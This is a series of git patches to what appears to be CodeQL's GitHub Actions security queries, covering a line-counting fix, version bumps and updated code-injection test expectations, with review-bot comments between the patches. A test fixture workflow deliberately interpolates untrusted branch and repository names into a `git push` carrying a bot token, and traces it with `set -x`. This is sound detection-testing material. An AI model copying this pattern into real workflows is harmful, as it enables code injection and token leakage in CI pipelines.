| -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | From 58f060234a066b8aa37212cf249d2c2466f2c4bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:17:24 +0100 Subject: [PATCH 0647/1267] fix: count(text.splitAt()) does not account for all lines, use max(text.splitAt(,i)) instead --- ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5f33400bb96..57466225414 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -4,12 +4,16 @@ private import codeql.actions.Helper private import codeql.actions.config.Config private import codeql.actions.DataFlow +bindingset[text] +int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", i))) } + /** * Gets the length of each line in the StringValue . */ bindingset[text] -int lineLength(string text, int idx) { - exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1) +int lineLength(string text, int i) { + i in [0 .. numberOfLines(text)] and + result = text.splitAt("\n", i).length() + 1 } /** @@ -17,7 +21,7 @@ int lineLength(string text, int idx) { */ bindingset[text] int partialLineLengthSum(string text, int i) { - i in [0 .. count(text.splitAt("\n"))] and + i in [0 .. numberOfLines(text)] and result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) } From fcc7efbc5cd73824835b157118b38374e2b5d0bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:19:06 +0100 Subject: [PATCH 0648/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9554a52d934..29a1796e182 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.79 +version: 0.1.80 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f6fe9791a93..a1caa702790 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.79 +version: 0.1.80 groups: [actions, queries] suites: codeql-suites extractor: javascript From 685c9e97ccf05aea3bcd2569adcfde71a18e2989 Mon Sep 17 00:00:00 2001 
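Review bot: The new `numberOfLines` predicate in the first Ast.qll hunk has no QLDoc, and its name promises a count while `max(int i | exists(text.splitAt("\n", i)))` yields the highest 0-based index, which is one less than the number of lines. Both callers in this commit, `lineLength` here and `partialLineLengthSum` in the `@@ -17,7 +21,7 @@` hunk, use it as an inclusive upper bound in `[0 .. numberOfLines(text)]`, so their ranges are correct. A later caller that trusts the name would be off by one, though, and these predicates appear to feed the line and column offsets that alert locations are derived from. I would document the contract on the predicate, for example `/** Gets the 0-based index of the last line of text (the line count minus one). */`, or rename it to something like `lastLineIndex`.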
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 21:17:55 +0100 Subject: [PATCH 0649/1267] Bump qlpack versions --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +---- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 57466225414..1589b18efb0 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -11,10 +11,7 @@ int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", * Gets the length of each line in the StringValue . */ bindingset[text] -int lineLength(string text, int i) { - i in [0 .. numberOfLines(text)] and - result = text.splitAt("\n", i).length() + 1 -} +int lineLength(string text, int i) { result = text.splitAt("\n", i).length() + 1 } /** * Gets the sum of the length of the lines up to the given index. diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 29a1796e182..a33cecb6fe0 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.80 +version: 0.1.81 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a1caa702790..6d1bc8634ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.80 +version: 0.1.81 groups: [actions, queries] suites: codeql-suites extractor: javascript From f76d4d67d990d5b32c46bd0878da432eec491c83 Mon Sep 17 00:00:00 2001 
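Review bot: After this hunk `lineLength` is just `result = text.splitAt("\n", i).length() + 1`, but the QLDoc kept above it still reads "Gets the length of each line in the StringValue ." and explains neither the index `i` nor the `+ 1`. I would reword it to something like `/** Gets the length of line i (0-based) of text, plus 1 for the line separator. */`, assuming the `+ 1` is indeed there for the newline. The hunk also drops the `i in [0 .. numberOfLines(text)]` guard added one patch earlier, under a commit titled "Bump qlpack versions"; a short why-comment such as `// i is bound by splitAt itself, no explicit range needed` would record the reason, if that is it. The opening `/**` of the comment lies outside the hunk.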
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 22:31:15 +0100 Subject: [PATCH 0650/1267] tests: update tests --- .../.github/workflows/publishResults.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++++++-------- .../CWE-094/CodeInjectionMedium.expected | 12 ++++++------ 3 files changed, 28 insertions(+), 14 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml index 17d9680d907..b4c2ecaec70 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -60,6 +60,20 @@ jobs: id: git-commit if: steps.search-patch.outputs.result run: | + set -x + # Set initial placeholder name/mail and read it from the patch later + git config --global user.email 'foo@bar' + git config --global user.name 'Foo Bar' + + git am version_increments.patch + + # Read the author's name+mail from the just applied patch and recommit it with both set as committer + botMail=$(git log -1 --pretty=format:'%ae') + botName=$(git log -1 --pretty=format:'%an') + git config --global user.email "${botMail}" + git config --global user.name "${botName}" + git commit --amend --no-edit + fileList=$(git diff-tree --no-commit-id --name-only HEAD -r) echo "file-list<> $GITHUB_OUTPUT echo "$fileList" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 5187e875cb7..a862c0901ca 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
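Review bot: The added `set -x` turns on shell tracing at the top of the `git-commit` run script, and that script, as quoted in the `.expected` rows, later runs `git push` with `${BOT_PA_TOKEN}` embedded in the URL. In a real workflow the expanded command would be written to the job log and protected only by log masking. This file is a query-test fixture under CWE-094, so the pattern may be intentional, but nothing in the hunk says so or explains why the script was lengthened. A YAML comment above the step would record it, e.g. `# test fixture: long script with blank lines, exercises line offsets of the ${{ }} sinks`, if that is the intent; adding it shifts the line numbers in the `.expected` files, which would need regenerating. The `run:` block continues past the end of the hunk.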
@@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
@@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit 
[file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -623,8 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ 
github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ddfa951241e..be14d58737e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
